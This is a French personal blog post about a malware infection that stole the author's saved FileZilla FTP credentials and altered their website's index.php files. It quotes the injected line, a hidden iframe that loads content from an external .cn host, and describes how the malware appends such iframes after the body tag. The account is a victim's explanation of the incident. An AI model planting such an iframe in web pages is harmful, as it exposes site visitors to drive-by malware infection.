Cela fait plus d’un mois que je n’ai pas écrit sur le blog. J’ai pas mal de raisons pour cela: vacances, beau temps, changement de pays, changement de boulot et … le hacking.

Petit historique:

Avertissement Chrome : site prejudiciable

- Il y a quelques mois, je clique sur une pub Adwords. Chrome m’indique que le site peut infecter mon ordinateur. Je me dis naïvement : « Oh, c’est bon, j’en vois des dizaines de sites comme ça tous les jours. Cela va être un popup qui me fait croire que j’ai un virus. Il suffit juste que je ne clique pas sur exécuter, je connais la procédure ».  Mais sans rien cliquer, je vois que plein de popup pour des faux antivirus apparaissent, mais pas des fenêtres de navigateurs; de vrais logiciels,… bref j’étais infecté. Après quelques bonnes heures à passer plusieurs antivirus (j’utilisais Nod32 à l’époque), je réussis à nettoyer l’infection. Ou en tout cas, l’infection semble relativement disparue, même si j’ai encore quelques alertes régulières quand je démarre mon PC.  Dans un coin de ma tête, je me dis qu’il faut que je réinstalle Windows un de ces jours, mais je m’arrête là.

-Fin juin (donc plusieurs mois après cette infection), ma compagne me dit que notre site a une page d’erreur sur la page d’accueil et qu’elle a réuploadé la page index.php . Aussitôt, cela me met une grosse puce à l’oreille puisque je n’ai pas uploadé le fichier index depuis plusieurs mois. Bref, si erreur il y a, intrusion il y a aussi. Après vérification, je découvre le pot aux roses. Ma page index.php avait été modifié, à la barbare. Une petite ligne avait été ajouté dans le code php :

<iframe src="http://globalmixgroup.cn :8080/ts/in.cgi?pepsi65" width=125 height=125 style="visibility: hidden"></iframe>

Evidemment,cela entrainait une erreur lors de l’affichage de la page puisque les fonctions php étaient coupées au milieu.

Après quelques tests, je me suis rendu compte que le hacker avait accès à mes comptes ftp enregistrés sur Filezilla. En attendant de pouvoir réinstaller Windows,  j’ai donc fermé tout accès ftp sur l’ensemble des sites hébergés sur mon serveur. Voici , en tout cas, ce que j’ai pu remarquer du comportement du virus:

  • Il regarde, dans tous les sous-répertoires, tous les fichiers index (.php / .html ) ainsi que les fichiers comportant le mot-clé default.
  • Dans ces fichiers, il vérifie s’il y a la balise <body> et ajoute à la suite une iframe externe pointant vers un .cn ou vers un .info. S’il ne trouve pas la balise <body>, il supprimera les derniers caractères de la page et ajoutera l’iframe même si le fichier est en php et non en html.

Bref, cela m’a fait perdre de nombreuses heures, surtout que j’ai eu des problèmes en réinstallant Windows, mais ça, c’est une autre histoire